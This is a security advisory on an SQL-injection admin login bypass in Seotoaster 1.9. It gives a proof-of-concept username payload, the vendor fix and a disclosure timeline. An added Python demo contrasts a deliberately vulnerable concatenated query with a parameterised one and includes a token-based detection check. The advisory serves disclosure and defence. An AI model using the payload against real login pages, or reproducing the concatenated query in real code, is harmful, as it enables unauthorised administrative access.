INFOSERVE-ADV2011-06 - Seotoaster SQL-Injection Admin Login Bypass
Advisory: Seotoaster SQL-Injection Admin Login Bypass
Advisory ID: INFOSERVE-ADV2011-06
Author: Stefan Schurtz
Contact:
Affected Software: Successfully tested on Seotoaster v.1.9
Vendor URL:
Vendor Status: fixed
======================
Vulnerability Description
======================
Seotoaster v.1.9 is prone to an SQL-Injection which bypasses the admin login.
==============
PoC-Exploit
==============
http://<target>/seotoaster/go
User: ' or 1=1)#
PW: notimportant
=====
Solution
=====
Upgrade to the latest version
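To make the flaw and the fix concrete, the following is an added example and not Seotoaster's own code: a minimal admin-login lookup in Python on SQLite, with the string-concatenated query that the advisory's payload defeats beside its parameterised replacement, plus a small log-audit heuristic a defender can run over recorded login attempts. The table schema, column names and credentials are constructed for the demo; SQLite has no `#` line comment (MySQL does), so the vulnerable function maps `#` to `--` purely to keep the advisory's payload shape working offline.

```python
import sqlite3


def make_db():
    # Constructed in-memory user table; schema, column names and the
    # credentials are assumptions for this demo, not Seotoaster's real schema.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, login TEXT, password TEXT, role TEXT)"
    )
    conn.execute(
        "INSERT INTO user (login, password, role) VALUES ('admin', 'h4rdT0Gu3ss', 'admin')"
    )
    conn.commit()
    return conn


def _sqlite_comment(value):
    # MySQL treats '#' as a line comment, SQLite does not. Only so the advisory's
    # payload behaves the same way in this offline demo, map '#' to '--'.
    return value.replace("#", "--")


def login_vulnerable(conn, user, pw):
    # Anti-pattern: user input concatenated into the SQL text. The quote in the
    # username terminates the string literal, "or 1=1" makes the parenthesised
    # condition true, and the comment token discards the password check.
    sql = (
        "SELECT login, role FROM user WHERE (login = '%s' AND password = '%s')"
        % (_sqlite_comment(user), pw)
    )
    return conn.execute(sql).fetchone()


def login_fixed(conn, user, pw):
    # Mitigation: a parameterised query binds the same input as data, so the
    # quote, the tautology and the comment token are never parsed as SQL.
    sql = "SELECT login, role FROM user WHERE (login = ? AND password = ?)"
    return conn.execute(sql, (user, pw)).fetchone()


def suspicious_login_input(value):
    # Detection heuristic for access-log review: a legitimate username never
    # contains a quote or an SQL comment token, so flag such attempts.
    return any(tok in value for tok in ("'", '"', "#", "--", "/*"))


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1)#"  # the username from the advisory's PoC
    print("vulnerable:", login_vulnerable(db, payload, "notimportant"))
    print("fixed:     ", login_fixed(db, payload, "notimportant"))
    print("flagged:   ", suspicious_login_input(payload))
```

Run as a script it shows the concatenated query returning the admin row for the PoC username while the parameterised query returns nothing; the same bound query still authenticates the real credentials, which is the check to add when verifying a vendor fix.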
================
Disclosure Timeline
================
15-Nov-2011 – Secunia SVCRP (vuln@secunia.com)
15-Dec-2011 – fixed by vendor
====
Credits
====
Vulnerability found and advisory written by the INFOSERVE security team.
=======
References
=======
http://secunia.com/advisories/46881/
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-06.txt